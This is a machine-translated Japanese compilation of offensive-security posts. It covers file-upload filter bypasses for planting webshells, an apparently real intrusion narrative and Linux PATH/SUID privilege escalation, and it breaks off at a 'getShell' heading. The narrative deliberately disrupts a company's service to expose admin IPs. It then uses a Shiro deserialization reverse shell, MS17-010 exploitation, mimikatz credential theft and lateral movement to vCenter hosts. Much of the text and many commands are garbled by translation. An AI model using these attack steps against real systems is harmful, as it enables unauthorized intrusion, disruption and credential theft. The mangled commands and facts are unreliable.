通垞、ファむルがHTTPプロトコルの䞋でアップロヌドされるず、POSTリク゚ストでWebサヌバヌに送信されたす。 Webサヌバヌがリク゚ストを受信しお同意するず、ナヌザヌはWebサヌバヌずの接続を確立し、デヌタを送信したす。次の怜出手順は、䞀般的なファむルのアップロヌドプロセス䞭に枡されたす。

䞀般に、ファむルのアップロヌド䞭の怜出は、以䞋の図の赀いセクションにマヌクされおいたす。

vwe1lq4swky7822.png

クラむアントJavaScript怜蚌通垞、ファむル拡匵子のみが確認されたす

サヌバヌ偎の怜蚌

ファむルヘッダヌコンテンツタむプのフィヌルド怜蚌画像/GIF

ファむルコンテンツヘッダヌ怜蚌GIF89A

ディレクトリルヌト怜出パスパラメヌタヌに関連するコンテンツを怜出

ファむル拡匵怜出ファむル拡匵機胜に関連する怜出

接尟蟞ブラックリストの確認

接尟蟞ホワむトリストの確認

カスタム定期的な怜蚌

WAF機噚の確認異なるWAF補品に応じお

0x07

脆匱性バむパス

1。カスタマヌサヌビスバむパス

1クラむアント怜蚌:䞀般的に、JavaScriptスクリプトがWebペヌゞに蚘述され、アップロヌドされたファむルの接尟蟞名を確認したす。刀断方法ファむルを閲芧しおロヌドするずきは、[アップロヌド]ボタンをクリックする前に、ダむアログボックスが衚瀺されたす。内容は次のずおりです。jpg/.jpeg/.pngの接尟蟞名を持぀ファむルのみをアップロヌドし、珟時点ではデヌタパケットは送信されたせん。

2バむパス法:1。IEでJSスクリプトをFirefoxプラグむンNoScriptプラグむンたたは無効にする

2。firbugプラグむン芁玠を介しおコヌドを確認しお倉曎したすonsubm:t=” returnの削陀など

checkfile "event

3。firbug芁玠を介しおJavasciptスクリプトのアップロヌドファむルタむプを確認したす。

4. Burpを䜿甚しおパッケヌゞをキャッチおよび倉曎するこずにより、最初にGIFタむプのTrojanをアップロヌドしおから、Burpを介しおASP/PHP/JSPサフィックス名に倉曎したす。

泚ここでファむル名を倉曎した埌、リク゚ストヘッダヌのコンテンツレングス倀も倉曎する必芁がありたす。

デモンストレヌションは次のずおりです。

Fidderはパケットキャプチャずむンタヌセプトを実行し、最初にBD2.jpgなどの画像トロむの朚銬の文をアップロヌドし、次にパケットキャプチャを倉曎しおBD2.phpに迎撃したす

wmmozzbl21x7823.png

2。サヌバヌバむパス

1ブラックリスト拡匵バむパス

ブラックリスト怜出䞀般的に、䞀般的な危険なスクリプトファむルを含む特別なブラックリストファむルがありたす。バむパス方法

1ネットから逃れるためのブラックリスト拡匵機胜を芋぀けたす - IIS6.0のASAやCERなど

2ケヌスバむパスの脆匱性がある堎合がありたす -

たずえば、ASPIIS6.0で䜿甚できたすおよびPHPPHP5.3.39よりも小さいLinuxでのみ䜿甚できたす

3Webコンテナで解析できるファむルのその他の拡匵機胜のリスト

jsp、jspx、jspf

ASP ASA CER CDX、HTML、XML、HTML

ASPX、ASHX、ASMX、ASAX、ASCX

デモPHPでのケヌス解析はLinuxでのみ䜿甚できたす

環境は実行できたす

nuomj15fz0g7824.png

PHPのアップロヌドはここでは蚱可されおいないので、倧文字ず倧文字のPHPをアップロヌドできたす

y3qial2zjtf7825.png

5u1h2tkbj5p7826.png

o1ahxj0vxrp7827.png

2ブラックリストの特別な接尟蟞名バむパス利甚の難易床が高い

burpsuiteがbaclion.php4php1、php2、php4、php5にむンタヌセプトされたデヌタパケットのbacklion.php名を倉曎したす。

aarigutfikk7828.png

3オペレヌティングシステムファむルの呜名ルヌルでバむパス

Windowsシステムの䞋で、ファむル名が「で終了する」たたはスペヌスでは、システムは自動的に「」を削陀したす。ずスペヌス。この機胜は、ブラックリストの怜蚌をバむパスするためにも䜿甚できたす。 Apacheでは、ポむント゚ンディングずスペヌスを䜿甚しおバむパスできたす。ASPずASPXでは、スペヌスを䜿甚しおバむパスできたす。

a。 Windowsファむルネヌミングルヌルに準拠しおいないファむル名をアップロヌドするず、Windowsシステムによるコンプラむアンス違反蚘号の埌にコンテンツが自動的に削陀されたす。

test.asp。

2nsbecllm4c7829.png

test.aspスペヌス

gisfnhmhj237830.png

test.php:1.jpg

oejagimf24z7831.png

test.php3360: $デヌタ

1vcihvnxvi37832.png

b。接尟蟞はLinuxの䞋のケヌスです

Linuxでは、PHPのアップロヌドが解決されない堎合、PHPサフィックスでファむル名をアップロヌドしおみるこずができたす前提条件は、PHPバヌゞョンがバヌゞョン5.3.29以䞋であるこずです

s30yezaqj207833.png

4シングルサフィックスずダブルサフィックス
によっおバむパスされたす

アップロヌドするずきは、ファむル名Backlion.phpbacklion.asaをBurpsuiteによっおbacklion.pphphphbacklion.asasaaに傍受したデヌタパケットの倉曎を倉曎したす。最初の「PHP」文字列をフィルタリングした埌、「P」ず終了「HP」が組み合わされおPHPを圢成したす。

5サヌバヌMIMEファむルタむプコンテンツタむプバむパス

MIMEの圹割クラむアント゜フトりェアがさたざたな皮類のデヌタを区別できるようにしたす。たずえば、WebブラりザヌはMIMEタむプを䜿甚しお、ファむルがGIF画像か印刷可胜なPostScriptファむルであるかを刀断したす。 WebサヌバヌはMIMEを䜿甚しお送信されるデヌタの皮類を説明し、WebクラむアントはMIMEを䜿甚しお受信したいデヌタの皮類を説明したす。これは、ブラりザによっお枡されたファむルの圢匏を決定するためにサヌバヌが䜿甚する重芁なマヌキングアむテムです。

䞀般的に䜿甚されるファむルアップロヌドタむプMIMEテヌブルテキスト/プレヌンプレヌンテキスト

Text/HTMLHTMLドキュメント

Text/JavaScriptJSコヌド

アプリケヌション/xhtml+xmlxhtmlドキュメント

画像/gifgif画像

画像/jpegjpeg画像

画像/PNGPNG画像

ビデオ/MPEGMPEGアニメヌション

アプリケヌション/オクテットストリヌムバむナリデヌタ

アプリケヌション/PDFPDFドキュメント

アプリケヌション/プログラミング蚀語この蚀語のコヌド

Application/MSWORDMicrosoft

単語ファむル

メッセヌゞ/RFC822RFC 822フォヌム

MultiPart/AlternativeHTMLフォヌムずHTMLメヌルのプレヌンテキスト圢匏、同じコンテンツが異なる圢匏で衚されたす

Application/x-www-form-urlencodedpostメ゜ッドで提出されたフォヌム

MultiPart/form-data投皿が送信されたずきにファむルでアップロヌドされたフォヌム

バむパス方法アップロヌドはファむルタむプを制限したす。 Burpsuitを䜿甚しお、他のファむルタむプを倉曎しお、次のようなファむルタむプを実行できたす。Content-TypeImage/GIFおよびImage/JPEG。

sxikizmuyvz7834.png

m1brap3fnih7835.png

nbi0ja1rktg7836.png

6協力ファむルには、脆匱性バむパス
が含たれおいたす

バむパス法1スクリプトトロむの朚銬ず1文のコンテンツを含むアップロヌドファむルを実行したす。前提条件怜蚌ルヌルは、サフィックス名ASP/PHP/JSPを含むファむルのコンテンツがトロむの朚銬であるかどうかのみをチェックしたす。

aコンテンツが接尟蟞名をチェックしないため、最初にトロむの朚銬のコンテンツを含むTXTサフィックスファむルをアップロヌドしたす。

b次に、a .phpファむルをphpのコンテンツにアップロヌドしたす "アップロヌドされたtxtファむルパス";

この時点で、このPHPファむルはTXTファむルのコンテンツを参照しお、怜蚌をバむパスしたす。次のリストには、構文が含たれおいたす。

Php

phpは 'アップロヌドされたtxtファむルパス';

ASP

 - file='アップロヌドされたtxtファむルパス'を含める -

jsp

JSP:INCLDEペヌゞ='アップロヌドされたtxtファむルパス'/

たたは

@include file='アップロヌドされたtxtファむルパス'

rgdtp2a2krs7837.png

ykz1ixysrtz7838.png

方法2ロヌカルファむルに脆匱性があり、条件圢匏をすぐに満たすドキュメントをアップロヌドできたす。ドキュメントのコンテンツは、Trojan、䟋test.txtです

アップロヌドされたTrojanファむル、eg:pageid=d:/www/test.txtなど、ファむル包含脆匱性を掻甚しおください。

7URLバむパスのパラメヌタヌを倉曎

Googleキヌワヌドinurl:Newslist.aspnodecode=

/uploadfile.asp?uppath=picpathupname=uptext=form1.picpathのパラメヌタヌuptextの倀を倉曎したす。

パラメヌタヌPicpathが倉曎されおいるこずがわかりたす。この脆匱性には、䞻にファむル名たたはパスフィルタリングが含たれたす。実際の戊闘でもっず芳察しおください。

URLのパラメヌタヌでは、デヌタを倉曎するこずができたす

8デュアルファむルアップロヌドバむパス

次のコヌドを1.htmlずしお保存しおアップロヌドを倉曎したす。

圢状

action='http://edu2b.sinaapp.com/upfile_adpic.asp' method='post'

name='form1'

enctype='multipart/form-data'

入力名='filename1' type='file' class='tx1' size='40 '

入力名='filename2' type='file' class='tx1' size='40 '

入力タむプ='送信' name='送信'倀='アップロヌド'

/圢状

//最初のボックスでjpg画像を遞択するず、ファむル名は「yueyan.jpg」です。

2぀のボックスでCERファむルを遞択したす。ファむル名は「yueyan.cer」で、「アップロヌド」をクリックしおこれらの2぀のファむルをプログラムに送信したす。

3。ホワむトリストバむパス

1Webコンテナず組み合わせた分析の脆匱性

ディレクトリ解決IISの脆匱性ずセミコロン解決脆匱性

Trojan Horse Backlion.phpのファむル名をBacklion.php.abcに倉曎したす奇劙な未解決の接尟蟞名はすべおです

わかりたした。たず、サヌバヌがファむル拡匵子を怜蚌するず、abcを怜蚌したす。拡匵機胜がサヌバヌ偎の癜黒リストルヌルに準拠しおいる限り、アップロヌドするこずができたす。

nginx empty byte脆匱性xxx.jpg00.php xxx.jpg00.phpのようなファむル名はphpコヌドに解析され、実行されたす

Apacheの解析脆匱性、A.Php.rar A.Php.gifなどのタむプのファむル名をアップロヌドするこずで、PHPファむルのフィルタリングメカニズムを回避できたす。ただし、Apacheはファむル名を解析するずきに右から巊に読み取るため、認識されおいない拡匵機胜に遭遇した堎合、スキップされたす。 RARおよびその他の拡匵機胜はApacheで認識できないため、このタむプはPHPずしお盎接認識されるため、PHPコヌドを泚入する目的を達成したす。

200アップロヌドバむパス

アップロヌド時にbacklion.asp.jpgを00に倉曎したす。぀たり、backlion.asp00.jpg。ファむルシステムが00を読み取るず、ファむルが終了したず芋なされ、backlion.asp.jpgのコンテンツをbacklion.aspに曞き蟌み、攻撃の目的を達成したす。すべおのホワむトリストベヌスのサフィックスチェックでは、00をバむパスするこずはできたせん。コヌドの実装䞭に、切り捚おられたアップロヌド脆匱性がある必芁がありたす。アップロヌド圢匏は次のずおりです。

bk.asp00.jpg

Path/updata/bk.asp0x00.jpg

lxmm2opxrh37839.png

cf3ohrwyryx7840.png

aqyixrqq3ca7841.png

4ファむルパスバむパス
を突砎したす

ファむルをアップロヌドするず、プログラムは通垞、ナヌザヌが指定されたディレクトリにファむルを配眮できるようにしたす。指定されたディレクトリが存圚する堎合は、ファむルをディレクトリに曞き蟌みたす。存圚しない堎合は、最初にディレクトリを䜜成しおから曞き蟌みたす。たずえば、フロント゚ンドのHTMLコヌドには、非衚瀺のタグ入力タむプ='Hidden'がありたす

name='extension' value='up'/サヌバヌ偎に次のコヌドがありたすifis_dir$ extension{//フォルダヌが存圚しない堎合、フォルダヌを䜜成したす

mkdir$ extension;

}

攻撃者はツヌルを䜿甚しお、フォヌムの倀を「up」から「pentest.asp」に倉曎しお、文の画像をアップロヌドできたす。ファむルを受信した埌、プログラムはディレクトリを刀断したす。サヌバヌにPentest.aspディレクトリがない堎合、このディレクトリを䜜成し、画像パスワヌドファむルをPentest.aspディレクトリに曞き蟌みたす。 WebコンテナがIIS 6.0の堎合、Webトロむの朚銬は解析されたす。

次のディレクトリの堎所の倉曎は、いく぀かのフォヌムによっおバむパスされたすアップロヌド/1.ASP00.jpg

ASPの倉曎されたディレクトリの堎所00むンタヌセプト

bk.jpg #post文の銬やその他のホワむトリストを文ずしお提出するトロむの朚銬

-------アップロヌド/1.ASP00.jpg/bk.jpg最終生成されたファむルアクセスパス

fb4eipv2pax7842.png

-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

アップロヌド/bk.asp/

windows2003のディレクトリパスの埌にbk.aspのディレクトリを远加したすiis6.0

bk.jpg

投皿によっおアップロヌドされたファむルタむプは1぀の文章銬です

-----アップロヌド/bk.asp/aaabbk.jpg最終URLアクセスパス

j0pt02xk4sl7843.png

----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

アップロヌド/bk.asp; windows2003のディレクトリパスの埌にbk.aspを远加するディレクトリiis6.0

bk.jpgファむルタむプは、郵䟿でアップロヌドされたす1぀の文でbk.jpgになりたす

-----アップロヌド/bk.asp; 14127900008.asp ##最終URLアクセスパス

r1nv355d4xb7844.png

ここでは、動的ネットワヌク6.0を䟋ずしお、通垞の画像を最初にアップロヌドするず、Files/201210010321944973.jpgなどのファむルが生成されたす。最初のブレヌクスルヌ方法最初に画像ma ru 1.jpgの文をアップロヌドし、その埌、そのfilepath倀を「ファむル/backlion.asp□に挿入しお倉曎したす。

最埌に生成されたした「files/backlion.asp□/201210010321944973.jpg、これは実際にはファむル/backlion.aspです

2番目のブレヌクスルヌ最初に画像の文の文をアップロヌドしおから、filepath倀を「backlion.asp」に傍受しお倉曎したす。最埌に生成 "backlion.asp; 201210010321944973.jpg

HireHackking

0x01はじめに

゚ンタヌプラむズがTencent CloudやAlibaba Cloudなどのパブリッククラりドにビゞネスを眮いおいる堎合、゚ンタヌプラむズのむントラネットに接続されおいたせん。これは論理的分離に盞圓したす非物理的分離。゚ンタヌプラむズの情報セキュリティが比范的優れおおり、VPNアドレスたたはルヌタヌたたはファむアりォヌルサヌビスを公開しない堎合、情報を収集する際に゚ンタヌプラむズのむントラネットが䜿甚するパブリックネットワヌクアドレスを正確に芋぀けるこずは困難です。珟時点では、むントラネットを貫通するこずは比范的困難です。

パブリッククラりドから浞透、ロヌミングのためにむントラネットに実際の浞透プロセスを玹介したす。

0x02アヌリヌハンド

クラりドサヌバヌを取埗する方法はこの蚘事の焊点ではないため、詳现に玹介するのではなく、アむデアを簡単に玹介するだけです。

䌚瀟名によるず、Baiduで盎接、公匏のWebサむトの䜏所を発芋しおください。公匏りェブサむトの䜏所によるず、情報収集の波が実行されたした。

このサむトは、TencentクラりドホストであるCDNを䜿甚し、IPが倉曎され、実際のIPを怜出できないこずがわかりたした。コマンド実行の脆匱性があるこずがわかりたした。盎接RCEし、サヌバヌの暩限を取埗したす。最初にIPアドレスを芋おください

1049983-20220119225824142-886516029.jpgは、むントラネットアドレスが衚瀺されおいるこずを発芋したした。珟時点では、実際のIPを確認したすが、これはその埌のむントラネットの浞透には圹に立たない。

1049983-20220119225824614-2029697221.jpgのみ、それがテンセントクラりドであり、ホストがむントラネットにないこずがわかりたした。

0x03むントラネットを抌す方法を芋぀けたしょう

珟時点では、䌚瀟のオフィスネットワヌクの倖郚ネットワヌクIPを取埗する必芁がありたす。この倖郚ネットワヌクIPは、ファむアりォヌルたたはルヌタヌのいずれかです。それを手に入れる方法は私は解決策を思い぀きたした。䞀般に、クラりドホスト、運甚、メンテナンス担圓者は、SSHを通じおそれらを管理したす。䞀般的に、劎働時間䞭に、圌らは接続し、この時点で䌚瀟の実際のパブリックネットワヌクIPを取埗したす。

ちょっずしたトリックを教えおください。それが小さな䌚瀟の堎合、10日間たたは半月の間、運甚ずメンテナンスが接続されない堎合がありたす。珟時点では、「小さなダメヌゞ」を行い、操䜜ずメンテナンスをオンラむンで匷制するこずができたす。

たずえば、Webサヌビスなどを閉じるずきは、2぀のポむントに泚意を払っおください。操䜜ずメンテナンスによっおハッキングされおいるこずがわからないように、あたり行動しないでください。もちろん、事前にアクセス蚱可を維持できるので、ここでは玹介したせん。 「承認」がない堎合は、呚りを台無しにしないでください。承認がない堎合は、呚りを台無しにしないでください。蚱可がない堎合は、呚りを台無しにしないでください。そうしないず、無料の食事をするために局に行きたす。なぜ違法なこずができないのですかハハ。操䜜ずメンテナンスがオンラむンであるかどうかを芋おみたしょう[root@vm-0-13-centos〜] netstat -lantp | GREPは1049983-20220119225825107-448192981.jpgを確立したした。SSHDプロセスに焊点を圓おおいたす。この以前のパブリックネットワヌクIPは、運甚ずメンテナンスが配眮されおいる䌚瀟のパブリックネットワヌクIPです。私はそれらのうちの2぀をここで芋぀けたした。

0x04䞊蚘のIPの浞透

同じ退屈なものの波を取り、情報を収集したしょう。 Shiroが発行したシリアル化の脆匱性が発芋され、シェルが盎接反発されたした。

1049983-20220119225825587-2108005464.jpgが盎接入りたした1049983-20220119225826017-1073491067.jpgむントラネットアドレスを芋おくださいむントラネットアドレスは10.10.10.187 1049983-20220119225826488-1871372205.jpg

0x05幞せなむントラネットロヌミング

FRP+プロキシファむア゚ヌゞェントが構築されおいたす。ここで詳现に構築する方法を玹介したせん。自分でグヌグルで怜玢できたす。ずおも簡単です。 Socks5プロキシになり、AVトラフィックの怜出を避けるために暗号化するこずが最善です。たた、プロキシのパスワヌドを远加しお、「他の人」が䜿甚されないようにするのが最善です。ここでFRPの倉曎されたバヌゞョンを䜿甚しお、構成ファむルをリモヌトでロヌドする方法を䜿甚しお、少し回避し、トレヌサビリティの難易床を少し増やしたした。

1049983-20220119225827450-1310823462.jpg゚ヌゞェントが構築されたした。次に、むントラネットをスキャンしお確認しおください1049983-20220119225827906-1814496673.jpgには叀兞的なMS17-010の脆匱性がありたすが、実際、他の倚くの脆匱性が芋぀かりたした。最善のMS17-010を迅速に開始したしょう。これはWindows Serverであり、優れた利甚倀を持っおいたす。それを䜿甚した埌、サヌバヌを䜿甚しお別の゚ヌゞェントのレむダヌになりたす。 RDPでさえ、戊闘ずシャトルをすぐに終わらせるこずができたす。1049983-20220119225828283-981465360.jpg私のMSFはパブリックネットワヌクです。プロキシチャむンを䜿甚しお、プロキシず攻撃を盎接䜿甚しおいたす。

1049983-20220119225828688-485607524.jpg

攻撃を開始するさらに数回実行したす。1049983-20220119225829178-759784987.jpg攻撃は成功したしたこの写真は埌で远加され、情報は䞀貫性がないかもしれたせんが、原則は同じです。

暩限がシステムの最も高い蚱可であるこずを確認したしょう。そうすれば、電力の䞊昇を排陀できたす。

1049983-20220119225829591-1158518586.jpgミミカッツを䜿甚しおパスワヌドを぀かむ1049983-20220119225829970-945852077.jpg管理者のパスワヌドを取埗し、3389を開いおいるこずを芋぀け、プロキシ1049983-20220119225830337-483776704.jpg 1049983-20220119225830805-652126673.jpgを介しおプロキシ1049983-20220119225830805-652126673.jpgは、珟地の認蚌を䜿甚できたす。

1049983-20220119225831168-707181232.jpg 1049983-20220119225831620-863114579.jpg Qunhui NASも発芋されたした

1049983-20220119225832036-1309828630.jpg3 vcenters、非垞に倚くの仮想マシンがありたす。私はそれを簡単に芋お、䜕癟もいたした。すべおを匕き継ぐこずができたす

1049983-20220119225832545-1293887360.jpg

0x06芁玄

1。タヌゲット䌚瀟の名前を怜玢し、䌚瀟の公匏りェブサむトの䜏所を照䌚し、情報を収集するこずにより。送信メッセヌゞの察応するIPにはCDNサヌビスが含たれおおり、䌚瀟の実際の䜏所は取埗できたせん。䌚瀟のサブドメむン名にリモヌトコマンド実行の脆匱性があるため、サヌバヌの蚱可が取埗されたす。 2。アむスサ゜リを介したリモヌト接続ずコマンドを実行しお、IPアドレスifconfigを照䌚したす。 IPアドレスはすべおむントラネットアドレスずパブリックネットワヌクアドレスであるこずがわかりたす。パブリックネットワヌクアドレスを照䌚したすが、それでもTencent Cloud IP3です。タヌゲット䌁業の出口パブリックネットワヌクアドレスを取埗する必芁がありたす。ここでは、タヌゲットサむトがWebサヌビスのダりンタむムず異垞を実行できるようにするこずができたすサヌビスの閉鎖や異垞なWebサヌビストラフィックの原因など、操䜜およびメンテナンス担圓者がFortress Machineにログむンし、Tencent CloudホストにログむンしおWebサヌビスを衚瀺したす。 4。この時点で、ネットワヌク接続を確認し、タヌゲット䌁業の゚クスポヌトパブリックネットワヌクアドレスNetStat -LANTP | GREPは確立されおいたす5。 Through information collection, you will find that the target company's public IP port is out of a certain port, and there is a shiro deserialization vulnerability 6. Run the command to view the IP address, and find that the target is the intranet address :10.10.10.187, and test whether it is connected to the external network ping. www.baidu.com10。 Socks5プロキシは、FRP+プロキシフィヌタヌたたはプロキシチェむンを介しお実行されたす。ここでは、FRPのパスワヌドず単玔な暗号化を蚭定する必芁がありたす。 12。Proxifierを介しおFSCANをロヌドしお、タヌゲットむントラネットをスキャンし、10.10.10.105にMS17-01013があるこずを芋぀けたす。プロキシチャむンを介しおMSFをロヌドしお実行し、MS17-010モゞュヌルを䜿甚しお攻撃し、MimikatzはMSFUSE Exploit/Windows/SMB/MS17_010_ETERNALBLUEMSFSET RHOSTS 10.10.10.10.10.105MSFRUNMETERPTERGETUID //を取埗したす。 mimikatzmeterpretercreds_wdigest //ハッシュ倀14を取埗したす。管理者のパスワヌドを取埗し、3389を開いたこずがわかりたした。プロキシファむダヌSocks5プロキシに盎接移動しおリモヌトデスクトップ15にログむンしたした。システムに入るず、仮想マシンがあるこずがわかりたした。仮想マシンでロヌカル認蚌が䜿甚されたした。仮想マシンにログむンした埌、私はそれがQunhui NAS16であるこずがわかりたした。 Qunhui NasにはVMwareがありたす。 vSphere、3぀のvcentersオリゞナルリンクがありたす https://mp.weixin.qqc.com/s?__biz=mzg4ntuwmzm1ng==mid=22474929554Idx=1Sn=412BBB64E880E6F6F63BA3AE05B2129EB0CHKSM=CFA5414 9F8D2C85F3145E011EDF2EC5B05B2D0614B0408D48D48EA8DAA03087037228502C1686SCENE=178CUR_ALBUM_ID=1553386251775492092098RD

HireHackking

0x00はじめに

いく぀かのOSCPの課題を解決した埌、Linuxの蚱可アップグレヌドのためのさたざたな方法に関する蚘事を曞くこずにしたした。この蚘事では、「$ PATH倉数を䜿甚するさたざたな方法」を孊び、リモヌトホストぞのルヌトアクセスを獲埗したす。CTFチャレンゞで䜿甚される手法は、蚱可の゚スカレヌションに぀ながる$ PATHの脆匱性を生成したす。この蚘事を読むこずで、CTF埌の搟取の課題を解決した堎合、蚱可の゚スカレヌションに぀ながるいく぀かの脆匱性を認識したす。

0x001パス倉数の抂芁

パスは、すべおの実行可胜プログラムを保存するすべおのBINおよびSBINディレクトリを指定するLinuxおよびUNIXオペレヌティングシステムの環境倉数です。ナヌザヌがタヌミナルでコマンドを実行するず、ナヌザヌが実行したコマンドに応じおパス倉数の助けを借りお実行可胜ファむルを怜玢するようにシェルを芁求したす。たた、スヌパヌナヌザヌは通垞、 /sbinおよび /usr /sbinの暩限を持っおいたす。システム管理コマンドを簡単に実行したす。

Echoコマンドの助けを借りお、関連するナヌザヌのパスを衚瀺するのは非垞に簡単です。

゚コヌ$パス

/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games:/usr/games

「。」に気づいた堎合シンボル、次に環境パス倉数で、ログむンしたナヌザヌが珟圚のディレクトリからバむナリファむルずスクリプトを実行できるこずを意味したす。これは、攻撃者がルヌト蚱可を増やすための優れた手法です。これは、プログラムを䜜成する際の泚意が䞍足しおいるためであるため、管理者はプログラムぞの完党なパスを指定したせん。

0x03パス倉数重み付け方法1

1.Ubuntu実隓蚭定

珟圚、 /home /rajディレクトリで、名前がスクリプトずしお新しいディレクトリを䜜成したす。スクリプトディレクトリで、システムバむナリファむルに関数を呌び出す小さなCプログラムを曞きたす。

PWD

mkdirスクリプト

CDスクリプト

Nano Demo.C

sbhunefl5q58202.png

demo.cファむルでわかるように、システムバむナリであるPSコマンドプロセス状態を呌び出しおいたす。

ep3thbed1l48203.png

次に、GCCを䜿甚しおdemo.cファむルをコンパむルし、suid蚱可を高めおファむルをコンパむルしたす

ls

gcc demo.c -oシェル

Chmod u+sシェル

ls -laシェル

bl2glurdvco8204.png

2。蚱可匷化

最初に、タヌゲットシステムを攻撃しおから、アクセス蚱可゚スカレヌション段階に入る必芁がありたす。通垞のナヌザヌを䜿甚しお、SSHを介しお被害者のホストに正垞にログむンするずしたす。その埌、時間を無駄にせずに、Findコマンドの助けを借りお、SUIDたたは4000のアクセス蚱可を䜿甚しおファむルを怜玢したす。

find/-perm -u=s -type f 2/dev/null

したがっお、䞊蚘のコマンドの助けを借りお、攻撃者は実行可胜ファむルを列挙するこずができたす。ここでは、/home/raj/script/shellがsuid蚱可を持っおいるこずもわかりたす。

bpe1yheiz3o8205.png

次に、/home/raj/scriptディレクトリに移動し、実行可胜ファむル「シェル」が衚瀺されたす。このファむルを実行するず、このファむルがPSを実行しようずしおいるように芋えたす。これは、プロセス状態を取埗するために /bin内の実際のファむルです。

ls。/シェル

gpqwbe1ucmt8206.png

1゚コヌコマンドルヌト蚱可を生成する最初の手法

CD /TMP

echo '/bin/bash' ps

CHMOD 777 PS

゚コヌ$パス

゚クスポヌトパス=/TMP: $パス

CD/HOME/RAJ/スクリプト。/シェル

おっず

101hoo54w5h8207.png

2コマンドコマンド - ルヌト蚱可を生成するための2番目の手法

CD/home/raj/script/

CP /BIN /SH /TMP /PS

゚コヌ$パス

゚クスポヌトパス=/TMP: $パス。/シェル

おっず

aqlcno0koyo8208.png

3symlinkコマンド - ルヌト暩限を生成するための3番目の手法

LN -S /BIN /SH PS

゚クスポヌトパス=. $パス。/シェル

id

おっず

泚Symlinkはシンボリックリンクずも呌ばれ、ディレクトリに実行暩限がある堎合、正垞に実行されたす。 UbuntuのSymlinkの堎合、 /Script Directoryに777の暩限を䞎えたした

そのため、攻撃者は環境倉数パスを䜿甚しおアクセス蚱可を゚スカレヌトし、ルヌトアクセスを獲埗できるこずがわかりたす。

lxzwrw0jrx08209.png

0x04パス倉数重み付け方法2

1.Ubuntu実隓蚭定

䞊蚘の同じ手順を繰り返しお、独自の実隓を構成したす。スクリプトディレクトリで、システムバむナリファむルに関数を呌び出す小さなCプログラムを曞きたす。

PWD

mkdirスクリプト

CD /スクリプト

nano test.c

test.cファむルでわかるように、IDコマンド、぀たりシステムバむナリを呌び出しおいたす。

dyer5n5sxq08210.png

次に、GCCを䜿甚しおtest.cファむルをコンパむルし、SUID蚱可を拡倧しおコンパむルされたファむル

ls

gcc test.c -o shell2

chmod u+s shell2

LS -LAシェル2

fwcwm4cjhjo8211.png

2. permission Enhancement

同様に、タヌゲットシステムを攻撃しおから、特暩゚スカレヌション段階に入る必芁がありたす。通垞のナヌザヌを䜿甚しお、SSHを介しお被害者のホストに正垞にログむンするずしたす。その埌、時間を無駄にせずに、Findコマンドの助けを借りお、SUIDたたは4000のアクセス蚱可を䜿甚しおファむルを怜玢したす。ここでは、/home/raj/script/shell2がSUID蚱可を持っおいるかどうかを確認できたす。

find/-perm -u=s -type f 2/dev/null

次に、/home/raj/scriptディレクトリに移動し、実行可胜ファむル「shell2」を衚瀺したす。したがっお、このファむルを実行するず、Shell2がIDを実行しようずしおいるように芋えたす。これは /binの実際のファむルです。

cd/home/raj/script/

ls

./shell2

cuonk231fuz8212.png

1゚コヌコマンド

CD /TMP

echo '/bin/bash' id

CHMOD 777 ID

゚コヌ$パス

゚クスポヌトパス=/TMP: $パス

CD/HOME/RAJ/スクリプト

./shell2

おっず

yu0ahirnoa08213.png

0x05パス倉数電源゚レベヌション法3

1.Ubuntu実隓蚭定

䞊蚘の手順を繰り返しお、独自の実隓を蚭定したす。 raj.cファむルでわかるように、catコマンドを呌び出しお、ett/passwdファむルからその内容を読み取りたす。

bpoyhvpw4id8216.png

次に、GCCを䜿甚しおraj.cファむルをコンパむルし、コンパむルされたファむルにSUID蚱可を䌞ばしたす。

ls

gcc raj.c -o raj

chmod u+s raj

ls -la raj

ppn5e3bvi448218.png

2. permission Enhancement

被害者のシステムを再床攻撃し、蚱可アップグレヌド段階に入力したす。次のコマンドを実行しお、sudoナヌザヌリストを衚瀺したす。

find/-perm -u=s -type f 2/dev/null

ここでは、/home/raj/script/rajがSUID蚱可を持っおいるこずも確認できたす。その埌、/home/raj/scripディレクトリに移動し、実行可胜ファむル「Raj」を衚瀺したす。したがっお、このファむルを実行するず、ett/passwdファむルの内容が衚瀺されたす。

cd/home/raj/script/

ls

./raj

v5s5sntbsod8220.png

1Nano Editor4番目の蚱可拡匵技術

CD /TMP

ナノ猫

さお、タヌミナルが開いお /bin /basraを入力したら、保存したす

2lztbjg2wvl8222.png

CHMOD 777 CAT

ls -al cat

゚コヌ$パス

゚クスポヌトパス=/TMP: $パス

CD/HOME/RAJ/スクリプト

./raj

おっず

f3teso2xxnz8223.png

0x06パス倉数重み付け方法4

1.Ubuntu実隓蚭定

䞊蚘の手順を繰り返しお、独自の実隓を蚭定したす。 demo.cファむルでわかるように、catコマンドを呌び出しお /home /rajにあるmsg.txtコンテンツを読みたすが、 /home /rajにそのようなファむルはありたせん。

cszi2dkyclk8224.png

次に、GCCを䜿甚しおdemo.cファむルをコンパむルし、SUID蚱可を高めおファむルをコンパむルしたす

ls

gcc demo.c -o Ignite

chmod u+s Ignite

ls -la Ignite

qply3aqbr5q8226.png

2. permission Enhancement

被害者のシステムを再床攻撃し、蚱可アップグレヌド段階に入力したす。次のコマンドを実行しお、sudoナヌザヌリストを衚瀺したす。

find/-perm -u=s -type f 2/dev/null

ここでは、/home/raj/script/Igniteにsuid蚱可があるこずも確認できたす。その埌、/home/raj/scripディレクトリに移動しお、実行可胜ファむル「Ignite」が衚瀺されたす。そのため、このファむルを実行するず、結果ずしお゚ラヌ「CAT:/home/home/raj/msg.txt」が出力されたす。

cd/home/raj/script/

ls。/発火

iftby0p2qli8227.png

1VI線集者 - 5番目の蚱可゚ンハンスメントテクノロゞヌ

CD /TMP

vi猫

さお、タヌミナルが開いお /bin /basraを入力したら、保存したす

lb0ggllw43o8230.png

CHMOD 777 CAT

゚コヌ$パス

゚クスポヌトパス=/TMP: $パス

CD/HOME/RAJ/スクリプト。/発火

おっず

hghumadfs2d8234.png

HireHackking

0x00情報収集

メむンサむトにはクラりドWAFがあるため、テストされるずすぐにブロックされ、予備テストで䜿甚できる穎がないため、サブサむトに切り替えお、サブサむトを通じお貎重な情報を取埗したいず考えおいたす。

1049983-20220112164551048-417320309.png

これは、プロキシアカりントを照䌚するサむトです。 URL入力管理者は自動的に背景にゞャンプしたす。

1049983-20220112164551620-1446535893.png

このパラメヌタヌを芋お、それはcmfになるかもしれないず掚枬したす

0x01 getShell

